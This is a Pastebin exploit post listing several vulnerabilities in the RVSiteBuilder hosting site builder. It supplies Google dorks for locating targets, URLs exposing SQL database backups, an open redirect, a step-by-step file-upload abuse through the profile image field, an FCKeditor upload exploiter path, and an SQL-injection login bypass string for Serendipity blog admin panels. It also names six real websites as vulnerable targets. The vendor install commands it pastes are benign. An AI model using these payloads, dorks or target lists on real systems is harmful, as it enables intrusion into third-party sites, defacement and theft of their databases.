KingSkrupellos

RVSiteBuilder RVGlobalSoft Hosting Provider Multiple Vuln

Jun 10th, 2018
281
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 20.83 KB | None | 0 0
  1. #################################################################################################
  2.  
  3. # Exploit Title : RVSiteBuilder RVGlobalSoft CMS High-Performance Hosting Provider Serious Multiple Vulnerabilities
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Team
  5. # Date : 11/06/2018
  6. # Vendor Homepages : rvsitebuilder.com ~ rvglobalsoft.com ~ ckeditor.com ~
  7. + dynarch.com/jscal/ ~ jquery.com ~ docs.s9y.org ~ seagullproject.org ~ seagullsystems.com
  8. # Social Media Link : facebook.com/Rvglobalsoft/ ~ facebook.com/RVsitebuilder-331466346876534/
  9. + twitter.com/rvsitebuilder ~ twitter.com/rvglobalsoft_
  10. # Version : All Versions
  11. # Google Dork : inurl:''/rvsindex.php/''
  12. # Tested On : Windows and Linux Operating Systems
  13. # Category : WebApps
  14. # Exploit Risk : Medium and High
  15. # CWE : CWE-209 [ Information Exposure Through an Error Message ]
  16. + CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
  17. + CWE-264 [ Permissions, Privileges, and Access Controls ]
  18. + CWE-200 [ Information Exposure ]
  19. + CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
  20. + CWE-592 [ Authentication Bypass Issues ]
  21. + CWE-23 [ Relative Path Traversal ]
  22. + CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
  23. + CWE-36 [ Absolute Path Traversal ]
  24. + CWE-538 [ File and Directory Information Exposure ]
  25. + CWE-548 [ Information Exposure Through Directory Listing ]
  26.  
  27. #################################################################################################
  28.  
  29. # Title : RVSiteBuilder RVGlobalSoft CMS High-Performance Site Builder for WebHosts [ Hosting Provider ] 2018 Serious Multiple Vulnerabilities
  30.  
  31. # Description : RVglobalsoft is the leading software solutions for hosting provider.
  32.  
  33. # Vulnerabilities and Exploits includes =>
  34.  
  35. 1) Full Path Disclosure Vulnerability
  36. 2) SQL Injection Vulnerability
  37. 3) Arbitrary File Upload Vulnerability
  38. 4) Arbitrary File Download Database Backup .sql Vulnerability
  39. 5) What You See Is What You Get [ WYSIWYG ] FCKeditor Exploiter
  40. 6) Blog Administration Control Panel Authentication Bypass Vulnerability
  41. 7) Directory Traversal Vulnerability and Information Exposure Through Directory Listing
  42. 8) Information Exposure Through an Error Message
  43. 9) Permissions, Privileges, and Access Controls
  44.  
  45. # Google Dork 1 : inurl:''/rvsindex.php/''
  46.  
  47. # Google Dork 2 : inurl:''/rvsindex.php?/user/login''
  48.  
  49. # Google Dork 3 : inurl:''/rvsindex.php/user/register''
  50.  
  51. # Google Dork 4 : Index of /js Parent Directory SGL.js SGL/ SglFckconfig.js TreeMenu.js datetimepicker.js
  52.  
  53. #################################################################################################
  54.  
  55. # RevSiteBuilder Full Path Disclosure Vulnerability and PHP Warnings and Errors [ Critical Vuln for Server Rooting ] =>
  56.  
  57. TARGET/blog/rvsindex.php?/sitebuilder/action/list/
  58.  
  59. Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be compatible with SGL_OutputRendererStrategy::initEngine() in /opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89
  60.  
  61. Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible with SGL_OutputRendererStrategy::render($view) in /opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89
  62.  
  63. Strict Standards: Non-static method SGL_FrontController::isGoToClearCached() should not be called statically in /opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/FrontController.php on line 257
  64.  
  65. Strict Standards: Declaration of SGL_MDB2::query() should be compatible with MDB2_Driver_Common::query($query, $types = NULL, $result_class = true, $result_wrap_class = true) in /home/koleksim/.rvsitebuilder/websitepublish/3686a6380b5f3a8986f5ef385ce208f5/var/cachedLibs.php on line 82
  66.  
  67. Deprecated: Non-static method SGL_Task_SetupPaths::hostnameToFilename() should not be called statically, assuming $this from incompatible context in /opt/cpanel/ea-php56/root/usr/share/pear/RVSeagullMod/lib/SGL/Config.php on line 60
  68.  
  69. Warning: Include path '/usr/lib/php' not exists in /home/DOMAINADDRESS/public_html/rvscommonfunc.php on line 174
  70. Please contact your host provider ssh as root to server and run.
  71.  
  72. FOR CPANEL =>
  73.  
  74. pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
  75. perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi
  76.  
  77. FOR DİRECTADMİN =>
  78.  
  79. pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
  80. perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi
  81.  
  82. Fatal error: Class 'SGL_FrontController' not found in /home/DOMAINADDRESS/public_html/rvsindex.php on line 20
  83.  
  84. ####################################################################################################
  85.  
  86. PATH => TARGET/ComponentAndUserFramework.php
  87.  
  88. Please edit /home2/DOMAINADDRESS/public_html/php.ini
  89. change include_path to
  90. include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php"
  91.  
  92. # PATH for View Homepage => TARGET/rvsindex.php
  93.  
  94. ####################################################################################################
  95.  
  96. # PATH RevSiteBuilder Admin Login Control Panel => TARGET/admin or this is the Admin Panel way => /rvsindex.php?/user/login/
  97.  
  98. # PATH Admin Panel Login WordPress => TARGET/wp-login.php?redirect_to=http%3A%2F%2FDOMAINADDRESS%2F%2Fwp-admin%2F&reauth=1
  99.  
  100. # PATH Admin Panel Login Joomla => TARGET/administrator
  101.  
  102. # PATH Admin Panel Login osCommerce => TARGET/admin
  103.  
  104. # PATH Admin Panel Login OpenCart => TARGET/admin
  105.  
  106. Note : Some RVSiteBuilder websites uses wordpress and joomla but all files belongs to revsitebuilder and rvglobalsoft software. It is totally weird vulnerability.
  107.  
  108. They have path like TARGET/blogweb or TARGET/osc
  109.  
  110. But some sites gives this error. Sometimes it asks for username and password.
  111.  
  112. Please contact your provider edit file php.ini
  113. change include_path to
  114. include_path = ".:/usr/lib/php:/usr/local/lib/php"
  115. save file and restart apache
  116.  
  117. ####################################################################################################
  118.  
  119. # PATH for Uploaded Documents => TARGET/documents/
  120.  
  121. ####################################################################################################
  122.  
  123. # PATH for JS JQuery-Ui Demos and Documents [ View Original Sources ] => TARGET/js/jquery-ui/demos/ and TARGET/js/jquery-ui/docs/
  124.  
  125. # You can view => Interactions - Widgets ~ Effects ~ About jQuery UI ~ Theming - View Sources
  126.  
  127. ####################################################################################################
  128.  
  129. # PATH for JQuery Tests Version => TARGET/js/jquery-ui/tests/
  130.  
  131. ####################################################################################################
  132.  
  133. # PATH for Themes Codes => TARGET/js/jquery-ui/themes/base/ and TARGET/js/themes/
  134.  
  135. ####################################################################################################
  136.  
  137. # PATH jscalendar-1.0 "It is happening again" => TARGET/js/jscalendar/ => The Coolest DHTML Calendar - Online Demo
  138.  
  139. ####################################################################################################
  140.  
  141. # PATH Changelog Last Changes => TARGET/js/scriptaculous/CHANGELOG
  142.  
  143. ####################################################################################################
  144.  
  145. # PATH Learn Version => TARGET/js/scriptaculous/VERSION
  146.  
  147. ####################################################################################################
  148.  
  149. # PATH for Optimizer => TARGET/optimizer.php
  150.  
  151. Please edit /home2/DOMAIN/public_html/php.ini
  152. change include_path to
  153. include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php"
  154.  
  155. ####################################################################################################
  156.  
  157. # Other Paths that gives same error =>
  158.  
  159. #TARGET/rvsMasterCompoDB.php
  160. #TARGET/rvsStaticWeb.php
  161. #TARGET/rvscommonfunc.php
  162. #TARGET/rvssetup.php
  163.  
  164. Please edit /home2/DOMAIN/public_html/php.ini
  165. change include_path to
  166. include_path = ".:/usr/php/54/usr/lib64:/usr/php/54/usr/share/pear:/usr/local/lib/php"
  167.  
  168. ####################################################################################################
  169.  
  170. #QuickForm tutorial example - *Enter your name:
  171.  
  172. #/scripts/rvslib/Pear/quickFormTest.php
  173. #/themes/default/default/testForms.html
  174.  
  175. ####################################################################################################
  176.  
  177. #{if:adminApprove} {adminApprove}
  178. #/themes/rvtheme/authweb/authPage.html
  179.  
  180. ####################################################################################################
  181.  
  182. #{foreach:aFaqData,key,aValue} {if:aValue.category_name}
  183. #/themes/rvtheme/faqweb/viewFaqWeb.html
  184.  
  185. ###################################################################################################
  186.  
  187. #{if:forumsInstall} - Search for forums
  188. #TARGET/themes/rvtheme/forums/blocksearch.html
  189.  
  190. ####################################################################################################
  191.  
  192. # Testing forms
  193. # /themes/default/testForms.php
  194.  
  195. #################################################################################################
  196.  
  197. # RevSiteBuilder RVGlobalSoft Open Redirection Vulnerability
  198.  
  199. # TARGET/login => It automatically redirects to this URL Link here => /rvsindex.php?/user/login/action/login
  200.  
  201. # Open Redirection Page /rvsindex.php?/user/login/redir/ANY-DOMAIN-ADRESS
  202.  
  203. #################################################################################################
  204.  
  205. # {translate(pageTitle)} Contactus
  206. # /themes/rvtheme/main/contactMail.html
  207.  
  208. #################################################################################################
  209.  
  210. #{translate(#Please enter your name and e-mail address and select the newsletters that you want to subscribe.#)}
  211. #/themes/rvtheme/newsletter/authorize.html
  212. #/themes/rvtheme/newsletter/list.html
  213. #/themes/rvtheme/newsletter/uikit_list.html
  214.  
  215. #################################################################################################
  216.  
  217. #RVTheme Admin Area and Users useable Login Paths =>
  218.  
  219. #/themes/rvtheme/user/account.html
  220. #/themes/rvtheme/user/accountSummary.html
  221. #/themes/rvtheme/user/blockLogin.html
  222. #/themes/rvtheme/user/blockLogout.html
  223. #/themes/rvtheme/user/horizontalBlockLogin.html
  224. #/themes/rvtheme/user/loginForgot.html
  225. #/themes/rvtheme/user/prefUserEdit.html
  226. #/themes/rvtheme/user/profile.html
  227. #/themes/rvtheme/user/uikit_login.html
  228. #/themes/rvtheme/user/uikit_loginForgot.html
  229. #/themes/rvtheme/user/uikit_prefUserEdit.html
  230. #/themes/rvtheme/user/uikit_userAddUseCompoDB.html
  231. #/themes/rvtheme/user/uikit_userPasswordEdit.html
  232. #/themes/rvtheme/user/userAdd.html
  233. #/themes/rvtheme/user/userAddUseCompoDB.html
  234. #/themes/rvtheme/user/userPasswordEdit.html
  235. #/themes/rvtheme/user/verticalBlockLogin.html
  236. #/themes/rvtheme_admin/articleweb/admin_articleEdit.html
  237. #/themes/rvtheme_admin/articleweb/admin_articleManager.html
  238. #/themes/rvtheme_admin/articleweb/admin_articleTypeEdit.html
  239. #/themes/rvtheme_admin/articleweb/admin_articleTypeManager.html
  240. #/themes/rvtheme_admin/faqweb/admin_faqCategoryEdit.html
  241. #/themes/rvtheme_admin/faqweb/admin_faqWebEdit.html
  242. #/themes/rvtheme_admin/faqweb/admin_faqWebManager.html
  243. #/themes/rvtheme_admin/css/
  244.  
  245. #####################################################################################################
  246.  
  247. #Learn Version of the RVSiteBuilder and RVGlobalSoft => TARGET/version.txt
  248.  
  249. #####################################################################################################
  250.  
  251. #Flash Player Version Detection => TARGET/Scripts/AC_RunActiveContent.js
  252.  
  253. #####################################################################################################
  254.  
  255. Getting started with Seagull Project => [ Seagull PHP Framework - © Seagull Systems 2003-2007 ]
  256.  
  257. /rvsindex.php?/default/masterLayout/layout-navtop-3col.css/
  258.  
  259. #####################################################################################################
  260.  
  261. # RevSiteBuilder SQL Injection Vulnerability =>
  262.  
  263. #Strict Standards: Declaration of RVFlexyStrategy::initEngine() should be compatible with SGL_OutputRendererStrategy::initEngine() in /usr/local/lib/php/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89
  264.  
  265. #Strict Standards: Declaration of RVFlexyStrategy::render() should be compatible with SGL_OutputRendererStrategy::render($view) in /usr/local/lib/php/RVSeagullMod/lib/SGL/RVFlexyStrategy.php on line 89
  266.  
  267. #Warning: include(SGL_PATH/lib/SGL/FrontController.php): failed to open stream: No such file or directory in /home/DOMAINADDRESS/public_html/wysiwyg/fckeditor/editor/filemanager/connectors/php/config.php on line 264
  268.  
  269. #################################################################################################
  270.  
  271. # What You See Is What You Get [ WYSIWYG ] Exploiter =>
  272.  
  273. # WYSIWYG FCKeditor Arbitrary File Upload Vulnerability and Exploit
  274.  
  275. # Exploit => ..../wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html
  276.  
  277. # Example Site => /images/....
  278.  
  279. # Allowed File Extensions => .txt .png .gif .jpg .xml
  280.  
  281. # Sometimes Wysiwyg Editor Gives this error when trying upload a file to the server
  282.  
  283. Please contact your host provider ssh as root to server and run.
  284.  
  285. For cpanel
  286. pear install -f /var/cpanel/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
  287. perl /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/autoinstaller.cgi
  288.  
  289. For directadmin
  290. pear install -f /usr/local/rvglobalsoft/rvsitebuilder/scripts/RVSeagullMod-1.0.1.tgz
  291. perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi
  292.  
  293. Tutorial '' How to download RVsiteBuilder package file manually ? ''
  294.  
  295. For cPanel
  296. --------------------
  297.  
  298. SSH to your cPanel server as root and run command
  299.  
  300. cd /usr/local/cpanel/whostmgr/docroot/cgi/
  301.  
  302. rm -rf /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/
  303.  
  304. rm -f rvsitebuilderinstaller.tar
  305.  
  306. wget http://download.rvglobalsoft.com/rvsitebuilderinstaller.tar
  307.  
  308. tar -xvf rvsitebuilderinstaller.tar
  309.  
  310. rm -f rvsitebuilderinstaller.tar
  311.  
  312. mkdir /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages
  313.  
  314. cd /usr/local/cpanel/whostmgr/docroot/cgi/rvsitebuilderinstaller/packages
  315.  
  316. wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar
  317.  
  318. tar -xvf scriptdownloadpackage.tar
  319.  
  320. /usr/local/cpanel/3rdparty/bin/php scriptdownloadpackage.php
  321.  
  322. Once complete download file manually, please follow the instruction in this link. https://www.rvsitebuilder.com/installation/
  323.  
  324. --------------------
  325.  
  326. For DirectAdmin
  327.  
  328. --------------------
  329.  
  330. SSH to your cPanel server as root and run command
  331.  
  332. cd /usr/local/rvglobalsoft/rvsitebuilderinstaller/packages
  333.  
  334. wget http://download.rvglobalsoft.com/download.php/rvsdownload/scriptdownloadpackage.tar
  335.  
  336. tar -xvf scriptdownloadpackage.tar
  337.  
  338. php scriptdownloadpackage.php
  339.  
  340. Once complete download file manually, please follow the instruction in this link. https://www.rvsitebuilder.com/installation/
  341.  
  342. Reference => rvglobalsoft.com/knowledgebase/article/148/how-to-download-rvsitebuilder-package-file-manually/
  343.  
  344. Reference => rvskin.com/rvlogin/rvloginssh
  345.  
  346. ##################################################################################################
  347.  
  348. # RevSiteBuilder Arbitrary File Database DB Backup .sql Download Vulnerability
  349.  
  350. # TARGET/rvsDbBackup.sql => OR download and view SQL Database Backup Files => TARGET/rvsUtf8Backup/rvsDbBackup.sql
  351.  
  352. # View RevSiteBuilder Page Data Backup => TARGET/rvsUtf8Backup/rvsPageData.sql
  353.  
  354. # Example Site DB Backup View => archive.is/Demkr
  355.  
  356. ###################################################################################################
  357.  
  358. 1) Register yourself to the site
  359.  
  360. TARGET/rvsindex.php?/user/register/
  361.  
  362. It says => You have successfully been registered. Please check your email for confirmation of your password.
  363.  
  364. Note : Confirm your registration in order to proceed.
  365. Sometimes RVSiteBuilder and RVGlobalsoft gives you a new password or you choose your password while registration.
  366. Pay attention : When you register choose your nickname carefully because it is important.
  367.  
  368. It says => Activation is successfully. Please login.
  369.  
  370. 2) Login to the User Interface =>
  371.  
  372. TARGET/rvsindex.php?/user/login/action/login
  373.  
  374. 3) You can use Account - User Preference - User Password Change Area
  375.  
  376. /rvsindex.php?/user/account/action/viewProfile/
  377. /rvsindex.php?/user/account/
  378. /rvsindex.php?/user/userpreference/
  379. /rvsindex.php?/user/userpassword/action/edit/
  380.  
  381. 4) Go to your Profile like this =>
  382.  
  383. TARGET/rvsindex.php?/user/account/action/viewProfile/
  384.  
  385. Edit these Values
  386.  
  387. Choose Image Upload => Allowed File Extensions ( jpg,gif,bmp,png,txt,html)
  388.  
  389. It says => Your profile details have been successfully updated
  390.  
  391. PATH : /themes/rvtheme/images/YOURNİCKNAME.
  392.  
  393. Note : Your chosen nickname is important while registration. Upload your html or txt file but do not put like this .yournickname.html
  394.  
  395. Just . [ dot ] is important here. You will see your index on that site.
  396.  
  397. #################################################################################################
  398.  
  399. # Serendipity RevSiteBuilder Blog Administration
  400.  
  401. # /blogweb/serendipity_admin.php
  402.  
  403. # Username : '=''or'
  404. # Password : '=''or'
  405.  
  406. # You can use for both of them as '' admin '' '' admin ''
  407.  
  408. # /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect
  409.  
  410. # /blogweb/serendipity_admin_image_selector.php?serendipity[htmltarget]=img_icon&serendipity[filename_only]=true
  411.  
  412. # /blogweb/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect
  413.  
  414. # /blogweb/serendipity_admin.php?serendipity[adminModule]=personal
  415.  
  416. # /blogweb/uploads/yourfilename.rar
  417.  
  418. # Solution for Serendipity Blog Administration
  419.  
  420. # To mitigate this issue please upgrade at least to version 2.0.2:
  421.  
  422. # Download Link : https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip
  423.  
  424. # Please note that a newer version might already be available.
  425.  
  426. #################################################################################################
  427.  
  428. How to Install RVsitebuilder for Hosting Provider [ Bugs Fixation ] Check every folder and limit with .htaccess
  429.  
  430. cPanel
  431. ssh to your server as root and install plugin 'RVglobalsoft manager' by run following shell command:
  432. cd /usr/src; rm -fv rvsitebuilderinstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderinstall.sh; chmod +x rvsitebuilderinstall.sh; ./rvsitebuilderinstall.sh
  433. Login to WHM as root. Go to WHM > Plugins > and run RVglobalsoft manager then follow simple install process.
  434. Configure plugin for your panel. It's all done! RVsitebuilder is ready to use for all your users.
  435.  
  436. DirectAdmin
  437. ssh to your server as "root" and install plugin 'RVglobalsoft manager' by run following shell command:
  438. cd /usr/src; rm -fv rvsitebuilderdainstall.sh; wget http://download.rvglobalsoft.com/rvsitebuilderdainstall.sh; chmod +x rvsitebuilderdainstall.sh; ./rvsitebuilderdainstall.sh
  439. For DirectAdmin panel with PHP version 5.5 only (If your panel is lower version of PHP, skip to step 3)
  440. 2.1 Run the following command to make RVsitebuilder compatible with PHP 5.5:
  441. perl /usr/local/directadmin/plugins/rvsitebuilderinstaller/admin/installphpda.pl
  442. 2.2 Run the following command to make RVseagullmod compatible with PHP 5.5:
  443. perl /usr/local/rvglobalsoft/rvsitebuilderinstaller/autoinstaller.cgi --force=rvseagullmod
  444. Open file 'directadmin.conf' that located in: usr/local/directadmin/conf/directadmin.conf and change the value of 'numservers' from 5 to 15
  445. Go to Directadmin > Admin level > and run 'RVsitebuilder Admin' then follow simple install process.
  446. Login to DirectAdmin as "admin" and Configure plugin on your panel.
  447. RVsitebuilder in DirectAdmin plugins cannot configure hosting plans but
  448. you can set plans in user level by RVsitebuilder Admin
  449. Go to Directadmin > Admin level > open RVsitebuilder Admin and configure in 'User Control List' or 'Reseller Control List.'
  450.  
  451. #################################################################################################
  452.  
  453. RVSiteBuilder Last Changes and Bugs Fixation Reports [ Changelog ] => rvsitebuilder.com/changelog/
  454.  
  455. RVSiteBuilder Installation => rvsitebuilder.com/installation/
  456.  
  457. RVSiteBuilder and RVGlobalSoft Tutorials =>
  458.  
  459. rvsitebuilder.com/tutorials/ ~ rvglobalsoft.com/installation/ ~ documentation.cpanel.net/display/68Docs/Installation+Guide
  460.  
  461. ##################################################################################################
  462.  
  463. # Example Vulnerable Sites =>
  464.  
  465. 1) bevstop.com
  466. 2) ecologichouse.ro
  467. 3) delta-izoterm.com
  468. 4) smoke911ga.com
  469. 5) hoofin-about.co.uk
  470. 6) rkdzns.com
  471.  
  472. #################################################################################################
  473.  
  474. # Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team 2012 - 2018
  475.  
  476. #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment